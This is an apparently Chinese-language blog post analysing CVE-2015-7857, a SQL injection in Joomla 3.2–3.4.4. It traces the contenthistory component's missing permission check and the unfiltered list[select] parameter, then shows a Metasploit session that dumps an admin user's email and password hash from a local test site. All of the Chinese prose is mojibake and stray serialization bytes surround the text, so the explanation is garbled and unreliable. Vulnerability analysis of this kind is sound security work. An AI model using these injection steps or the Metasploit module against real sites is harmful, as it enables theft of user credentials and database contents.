I"ù;<h1 id="joomla-32-344-sqli-cve-2015-7857-æ¼æ´åˆ†æ">Joomla 3.2-3.4.4 Sqli CVE-2015-7857 æ¼æ´åˆ†æ</h1>
<p class="date">26 Oct 2015 - Tr3jer_CongRong</p>
<blockquote>
  <p>Joomlaæ˜¯ä¸€å¥—è·å¾—è¿‡å¤šä¸ªå¥–é¡¹çš„å†…å®¹ç®¡ç†ç³»ç»Ÿï¼ˆContent Management Systemï¼ŒCMSï¼‰ï¼Œå®ƒé‡‡ç”¨PHPï¼‹MySQLæ•°æ®åº“å¼€å‘ï¼Œå¯ä»¥è¿è¡Œåœ¨Linuxã€Windowsã€MacOSXã€Solarisç­‰å¤šç§å¹³å°ä¸Šã€‚é™¤äº†å…·æœ‰æ–°é—»/æ–‡ç« ç®¡ç†ã€æ–‡æ¡£/å›¾ç‰‡ç®¡ç†ã€ç½‘ç«™å¸ƒå±€è®¾ç½®ã€æ¨¡æ¿/ä¸»é¢˜ç®¡ç†ç­‰ä¸€äº›åŸºæœ¬åŠŸèƒ½å¤–ï¼Œè¿˜å¯ä»¥é€šè¿‡å…¶æä¾›çš„ä¸Šåƒä¸ªæ’ä»¶è¿›è¡ŒåŠŸèƒ½æ‰©å±•ã€‚åŒæ—¶å®ƒè¿˜æ”¯æŒå¤šç§è¯­è¨€ï¼Œç”±äºå®ƒçš„åŠŸèƒ½éå¸¸å¼ºå¤§ï¼Œè¯­è¨€æ”¯æŒå¼ºï¼Œå› æ­¤åœ¨å…¨ä¸–ç•ŒèŒƒå›´å†…éƒ½æœ‰å¾ˆå¹¿æ³›çš„åº”ç”¨ã€‚</p>
</blockquote>

<h4 id="æ¼æ´åˆ†æ">æ¼æ´åˆ†æ</h4>
<p>Â Â Â Â Â Â Joomlaè¿‘æ—¥çˆ†å‡ºä¸€ä¸ªç”±äºæ¥æ”¶å‚æ•°è¿‡æ»¤ä¸ä¸¥å¯¼è‡´sqlæ³¨å…¥çš„æ¼æ´<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7857">CVE-2015-7857</a>ï¼Œé€šè¿‡è¿™ä¸ªæ³¨å…¥æ¼æ´ç”šè‡³å¯ä»¥å¾—åˆ°æ•°æ®åº“ä¸­ä»»ä½•æ•°æ®,é¦–å…ˆçœ‹çœ‹æ¼æ´è§¦å‘ç»„ä»¶<code>contenthistory</code>ã€‚</p>

<blockquote>
  <p><code>/components/com_contenthistory/contenthistory.php</code></p>
</blockquote>

<pre><code>&lt;?php
defined('_JEXEC') or die;

// Load the com_contenthistory language files, default to the admin file and 	fall back to site if one isn't found
$lang = JFactory::getLanguage();
$lang-&gt;load('com_contenthistory', JPATH_ADMINISTRATOR, null, false, true)
||	$lang-&gt;load('com_contenthistory', JPATH_SITE, null, false, true);

// Hand processing over to the admin base file
require_once JPATH_COMPONENT_ADMINISTRATOR . '/contenthistory.php';
</code></pre>

<p>Â Â Â Â Â Â åŠ è½½äº†<code>/administrator/components/com_contenthistory/contenthistory.php</code>è¿™ä¸ªæ–‡ä»¶ï¼ŒJoomlaç®¡ç†ç»„ä»¶éƒ½æ”¾åœ¨<code>/administrator/components/</code>ç›®å½•ä¸‹ï¼Œè€Œä¸”æ‰€æœ‰ç®¡ç†ç»„ä»¶éƒ½ä¼šå…ˆæ£€æŸ¥æƒé™ï¼š</p>

<pre><code>if (!JFactory::getUser()-&gt;authorise('core.manage', 'com_checkin'))
{
return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR'));
}
</code></pre>

<p>Â Â Â Â Â Â å¯æ˜¯<code>com_contenthistory</code>ç»„ä»¶åœ¨requireä¹‹å‰å¹¶æ²¡æœ‰è¿›è¡Œæ­¤æƒé™æ£€æŸ¥ï¼Œå†çœ‹çœ‹åŠ è½½çš„è¿™ä¸ªç»„ä»¶éƒ½åšäº†ä»€ä¹ˆã€‚</p>

<blockquote>
  <p><code>/administrator/components/com_contenthistory/contenthistory.php</code></p>
</blockquote>

<pre><code>&lt;?php
defined('_JEXEC') or die;

$controller = JControllerLegacy::getInstance('Contenthistory', 	array('base_path' =&gt; JPATH_COMPONENT_ADMINISTRATOR));
$controller-&gt;execute(JFactory::getApplication()-&gt;input-&gt;get('task'));
$controller-&gt;redirect();
</code></pre>

<p>Â Â Â Â Â Â é¦–å…ˆè°ƒç”¨<code>JControllerLegacy</code>ç±»å¹¶èµ‹å€¼ç»™å˜é‡<code>$controller</code>ï¼Œéšå<code>$controller</code>è°ƒç”¨äº†æ§åˆ¶å™¨<code>execute()</code>æ–¹æ³•ã€‚è°ƒç”¨çš„è¿‡ç¨‹ä¼ é€’äº†<code>JFactory</code>ç±»çš„<code>getApplication()</code>æ–¹æ³•ï¼Œæœ€åè°ƒç”¨äº†<code>display()</code>æ§åˆ¶ç±»ï¼Œç”¨æ¥å®ç°æ˜¾ç¤ºçš„è§†å›¾æ¨¡å—ã€‚</p>

<blockquote>
  <p><code>/libraries/legacy/controller/legacy.php</code></p>
</blockquote>

<pre><code>public function display($cachable = false, $urlparams = array())
{
	$document = JFactory::getDocument();
	$viewType = $document-&gt;getType();
	$viewName = $this-&gt;input-&gt;get('view', $this-&gt;default_view);
	$viewLayout = $this-&gt;input-&gt;get('layout', 'default', 'string');

	$view = $this-&gt;getView($viewName, $viewType, '', array('base_path' =&gt; $this-&gt;basePath, 'layout' =&gt; $viewLayout));

	// Get/Create the model
	if ($model = $this-&gt;getModel($viewName))
	{
		// Push the model into the view (as default)
		$view-&gt;setModel($model, true);
	}

	$view-&gt;document = $document;

	$conf = JFactory::getConfig();

	// Display the view
	if ($cachable &amp;&amp; $viewType != 'feed' &amp;&amp; $conf-&gt;get('caching') &gt;= 1)
	{
		$option = $this-&gt;input-&gt;get('option');
		$cache = JFactory::getCache($option, 'view');

		if (is_array($urlparams))
		{
			$app = JFactory::getApplication();

			if (!empty($app-&gt;registeredurlparams))
			{
				$registeredurlparams = $app-&gt;registeredurlparams;
			}
			else
			{
				$registeredurlparams = new stdClass;
			}

			foreach ($urlparams as $key =&gt; $value)
			{
				// Add your safe url parameters with variable type as value {@see JFilterInput::clean()}.
				$registeredurlparams-&gt;$key = $value;
			}

			$app-&gt;registeredurlparams = $registeredurlparams;
		}

		$cache-&gt;get($view, 'display');
	}
	else
	{
		$view-&gt;display();
	}

	return $this;
}
</code></pre>

<p>Â Â Â Â Â Â ç¨‹åºè¿›è¡Œåˆ°è¿™ä¸ªæ–¹æ³•æ—¶ä¼šæ¥æ”¶<code>view</code>å‚æ•°è¿›è¡Œæ˜¾ç¤ºè§†å›¾ï¼Œåœ¨ç¬¬ä¸€ä¸ªifè¯­å¥å¿«ä¸­å¯ä»¥çœ‹å‡ºè¯·æ±‚åˆ°æ¨¡å—åæ—¶åˆ™åŠ è½½å¯¹åº”çš„æ¨¡å—ï¼Œæœ€å<code>$view</code>è°ƒç”¨<code>display()</code>æ–¹æ³•è¿›è¡Œè§†å›¾å¤„ç†ã€‚è·Ÿè¿›åˆ°<code>administrator</code>å†å²æ¨¡å—çš„æ•°æ®åº“æ“ä½œæ–¹æ³•ï¼Œç¨‹åºè¿›è¡Œåˆ°æ­¤è°ƒç”¨<code>getListQuery()</code>æ–¹æ³•æ—¶è¿›è¡Œæ•°æ®æå–ã€‚</p>

<blockquote>
  <p><code>/administrator/components/com_contenthistory/models/history.php</code></p>
</blockquote>

<pre><code>protected function getListQuery()
{
	// Create a new query object.
	$db = $this-&gt;getDbo();
	$query = $db-&gt;getQuery(true);

	// Select the required fields from the table.
	$query-&gt;select(
		$this-&gt;getState(
			'list.select',
			'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
			'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
		)
	)
	-&gt;from($db-&gt;quoteName('#__ucm_history') . ' AS h')
	-&gt;where($db-&gt;quoteName('h.ucm_item_id') . ' = ' . $this-&gt;getState('item_id'))
	-&gt;where($db-&gt;quoteName('h.ucm_type_id') . ' = ' . $this-&gt;getState('type_id'))

	// Join over the users for the editor
	-&gt;select('uc.name AS editor')
	-&gt;join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

	// Add the list ordering clause.
	$orderCol = $this-&gt;state-&gt;get('list.ordering');
	$orderDirn = $this-&gt;state-&gt;get('list.direction');
	$query-&gt;order($db-&gt;quoteName($orderCol) . $orderDirn);

	return $query;
}
</code></pre>

<p>Â Â Â Â Â Â è¿›è¡Œæ•°æ®æå–çš„æ—¶å€™è°ƒç”¨äº†<code>getState()</code>å‡½æ•°ï¼Œç”¨äºè·å–è¯·æ±‚æ¨¡å‹çš„å±æ€§å€¼ã€‚</p>

<blockquote>
  <p><code>/libraries/legacy/model/legacy.php</code></p>
</blockquote>

<pre><code>public function getState($property = null, $default = null)
{
	if (!$this-&gt;__state_set)
	{
		// Protected method to auto-populate the model state.
		$this-&gt;populateState();

		// Set the model state set flag to true.
		$this-&gt;__state_set = true;
	}

	return $property === null ? $this-&gt;state : $this-&gt;state-&gt;get($property, $default);
}
</code></pre>

<p>Â Â Â Â Â Â éšåè°ƒç”¨å½“å‰ç±»çš„<code>populateState()</code>æ–¹æ³•ï¼Œç”¨äºè¿‡æ»¤è¯·æ±‚çš„å‚æ•°ä¸ºæŒ‡å®šçš„æ•°æ®ç±»å‹ã€‚</p>

<blockquote>
  <p><code>/administrator/components/com_contenthistory/models/history.php</code></p>
</blockquote>

<pre><code>protected function populateState($ordering = null, $direction = null)
{
	$input = JFactory::getApplication()-&gt;input;
	$itemId = $input-&gt;get('item_id', 0, 'integer');
	$typeId = $input-&gt;get('type_id', 0, 'integer');
	$typeAlias = $input-&gt;get('type_alias', '', 'string');

	$this-&gt;setState('item_id', $itemId);
	$this-&gt;setState('type_id', $typeId);
	$this-&gt;setState('type_alias', $typeAlias);
	$this-&gt;setState('sha1_hash', $this-&gt;getSha1Hash());

	// Load the parameters.
	$params = JComponentHelper::getParams('com_contenthistory');
	$this-&gt;setState('params', $params);

	// List state information.
	parent::populateState('h.save_date', 'DESC');
}
</code></pre>

<p>Â Â Â Â Â Â ç¨‹åºæ‰§è¡Œåˆ°æ–¹æ³•æœ«å°¾æ—¶æ‰§è¡Œäº†<code>parent::populateState('h.save_date', 'DESC');</code>ä¹Ÿå°±æ˜¯è°ƒç”¨çˆ¶ç±»çš„<code>populateState()</code>æ–¹æ³•ï¼Œç”¨äºè¿‡æ»¤æ¥æ”¶çš„<code>list[]</code>æ•°ç»„ã€‚</p>

<blockquote>
  <p><code>/libraries/legacy/model/list.php</code></p>
</blockquote>

<pre><code>protected function populateState($ordering = null, $direction = null)
{
	// If the context is set, assume that stateful lists are used.
	if ($this-&gt;context)
	{
		$app = JFactory::getApplication();

		// Receive &amp; set filters
		if ($filters = $app-&gt;getUserStateFromRequest($this-&gt;context . '.filter', 'filter', array(), 'array'))
		{
			foreach ($filters as $name =&gt; $value)
			{
				$this-&gt;setState('filter.' . $name, $value);
			}
		}

		$limit = 0;

		// Receive &amp; set list options
		if ($list = $app-&gt;getUserStateFromRequest($this-&gt;context . '.list', 'list', array(), 'array'))
		{
			foreach ($list as $name =&gt; $value)
			{
				// Extra validations
				switch ($name)
				{
					case 'fullordering':
						$orderingParts = explode(' ', $value);

						if (count($orderingParts) &gt;= 2)
						{
							// Latest part will be considered the direction
							$fullDirection = end($orderingParts);

							if (in_array(strtoupper($fullDirection), array('ASC', 'DESC', '')))
							{
								$this-&gt;setState('list.direction', $fullDirection);
							}

							unset($orderingParts[count($orderingParts) - 1]);

							// The rest will be the ordering
							$fullOrdering = implode(' ', $orderingParts);

							if (in_array($fullOrdering, $this-&gt;filter_fields))
							{
								$this-&gt;setState('list.ordering', $fullOrdering);
							}
						}
						else
						{
							$this-&gt;setState('list.ordering', $ordering);
							$this-&gt;setState('list.direction', $direction);
						}
						break;

					case 'ordering':
						if (!in_array($value, $this-&gt;filter_fields))
						{
							$value = $ordering;
						}
						break;

					case 'direction':
						if (!in_array(strtoupper($value), array('ASC', 'DESC', '')))
						{
							$value = $direction;
						}
						break;

					case 'limit':
						$limit = $value;
						break;

					// Just to keep the default case
					default:
						$value = $value;
						break;
				}

				$this-&gt;setState('list.' . $name, $value);
			}
		}
		else
		// Keep B/C for components previous to jform forms for filters
		{
			// Pre-fill the limits
			$limit = $app-&gt;getUserStateFromRequest('global.list.limit', 'limit', $app-&gt;get('list_limit'), 'uint');
			$this-&gt;setState('list.limit', $limit);

			// Check if the ordering field is in the white list, otherwise use the incoming value.
			$value = $app-&gt;getUserStateFromRequest($this-&gt;context . '.ordercol', 'filter_order', $ordering);

			if (!in_array($value, $this-&gt;filter_fields))
			{
				$value = $ordering;
				$app-&gt;setUserState($this-&gt;context . '.ordercol', $value);
			}

			$this-&gt;setState('list.ordering', $value);

			// Check if the ordering direction is valid, otherwise use the incoming value.
			$value = $app-&gt;getUserStateFromRequest($this-&gt;context . '.orderdirn', 'filter_order_Dir', $direction);

			if (!in_array(strtoupper($value), array('ASC', 'DESC', '')))
			{
				$value = $direction;
				$app-&gt;setUserState($this-&gt;context . '.orderdirn', $value);
			}

			$this-&gt;setState('list.direction', $value);
		}

		// Support old ordering field
		$oldOrdering = $app-&gt;input-&gt;get('filter_order');

		if (!empty($oldOrdering) &amp;&amp; in_array($oldOrdering, $this-&gt;filter_fields))
		{
			$this-&gt;setState('list.ordering', $oldOrdering);
		}

		// Support old direction field
		$oldDirection = $app-&gt;input-&gt;get('filter_order_Dir');

		if (!empty($oldDirection) &amp;&amp; in_array(strtoupper($oldDirection), array('ASC', 'DESC', '')))
		{
			$this-&gt;setState('list.direction', $oldDirection);
		}

		$value = $app-&gt;getUserStateFromRequest($this-&gt;context . '.limitstart', 'limitstart', 0);
		$limitstart = ($limit != 0 ? (floor($value / $limit) * $limit) : 0);
		$this-&gt;setState('list.start', $limitstart);
	}
	else
	{
		$this-&gt;setState('list.start', 0);
		$this-&gt;setState('list.limit', 0);
	}
}
</code></pre>

<p>Â Â Â Â Â Â å‡½æ•°ä½¿ç”¨switchè¯­å¥åˆ¤æ–­<code>fullordering</code>ã€<code>ordering</code>ã€<code>direction</code>ã€<code>limit</code>æ˜¯å¦è¿‡æ»¤ï¼Œä½†æ˜¯æ²¡æœ‰éªŒè¯<code>list[select]</code>ï¼Œè¿™æ—¶å½“ç¨‹åºæ‰§è¡Œåˆ°<code>$this-&gt;getState(list.select)</code>ï¼Œåˆ™å¯¼è‡´æ³¨å…¥ã€‚æµ‹è¯•ä¸‹ï¼Œè®¿é—®<code>contenthistory</code>ç»„ä»¶æ—¶æ— é™åˆ¶åŠ è½½ï¼Œoption=comtenthistoryåŠ è½½å†å²æ¨¡å—ï¼Œview=historyåŠ è½½å†å²è§†å›¾ï¼Œlist[select]=1æ»¡è¶³æ¡ä»¶æ—¶ï¼Œåˆ™ä¼šæŠ¥é”™ã€‚</p>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/6u5htrdfgx.png" /></p>

<p>Â Â Â Â Â Â ç¨‹åºæ‰§è¡Œåˆ°<code>populateState()</code>æ–¹æ³•æ¥æ”¶å‚æ•°æ—¶ç¡®ä¿<code>item_id</code>ã€<code>type_id</code>ã€<code>list[ordering]</code>è¦åŒæ—¶ä¼ é€’ï¼Œå°±å¯ä»¥æ„é€ payloadè¿›è¡ŒæŠ¥é”™æ³¨å…¥è·å¾—æ•°æ®ï¼Œæ— éœ€è·å–è¡¨å‰ç¼€ï¼Œ%23_å³ä¸ºjoomlaè¡¨å‰ç¼€ï¼Œjoomlaä¼šè‡ªåŠ¨å°†#_è½¬æ¢ä¸ºè¡¨å‰ç¼€ï¼Œå› ä¸ºjoomlaçš„å‰ç¼€ä¸ºéšæœºå­—ç¬¦ä¸²ï¼Œä¹Ÿå¯ä»¥é€šè¿‡æŠ¥é”™è·å¾—è¿™ä¸ªéšæœºå­—ç¬¦ä¸²ã€‚</p>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/54gtersdf.png" /></p>

<blockquote>
  <p>Msfä¹Ÿå·²ç»æ›´æ–°äº†æ­¤æ¼æ´çš„Exploitï¼š</p>
</blockquote>

<pre><code>msf &gt; use auxiliary/gather/joomla_contenthistory_sqli
msf auxiliary(joomla_contenthistory_sqli) &gt; show options

Module options (auxiliary/gather/joomla_contenthistory_sqli):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format 	type:host:port[,type:host:port][...]
RHOST                       yes       The target address
RPORT      80               yes       The target port
TARGETURI  /                yes       The relative URI of the Joomla 	instance
VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) &gt; set RHOST 127.0.0.1
RHOST =&gt; 127.0.0.1
msf auxiliary(joomla_contenthistory_sqli) &gt; set TARGETURI /joomla_3.4.4
TARGETURI =&gt; /joomla_3.4.4
msf auxiliary(joomla_contenthistory_sqli) &gt; show options
	
Module options (auxiliary/gather/joomla_contenthistory_sqli):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format 	type:host:port[,type:host:port][...]
RHOST      127.0.0.1        yes       The target address
RPORT      80               yes       The target port
TARGETURI  /joomla_3.4.4    yes       The relative URI of the Joomla 	instance
VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) &gt; run

[+] Saved file to: /Users/CongRong/.msf4/loot/20151026230744_default_127.0.0.1_joomla.users_471318.txt
[+] Saved file to: /Users/CongRong/.msf4/loot/20151026230917_default_127.0.0.1_joomla.users_140130.txt
[*] Auxiliary module execution completed
msf auxiliary(joomla_contenthistory_sqli) &gt; cat .msf4/loot/20151026230744_default_127.0.0.1_joomla.users_471318.txt
[*] exec: cat .msf4/loot/20151026230744_default_127.0.0.1_joomla.users_471318.txt
[{"activation":"","block":"","email":"admin@qq.com","id":"1","lastResetTime":"","lastvisitDate":"","name":"","otep":"","otpKey":"","params":"","password":"d1a1976e385ae56e05524b9517111c75e47c1d23079229c867a7ecc5cd76e8a3","registerDate":"","requireReset":"","resetCount":"","sendEmail":"","username":"admin"}]
</code></pre>
:ET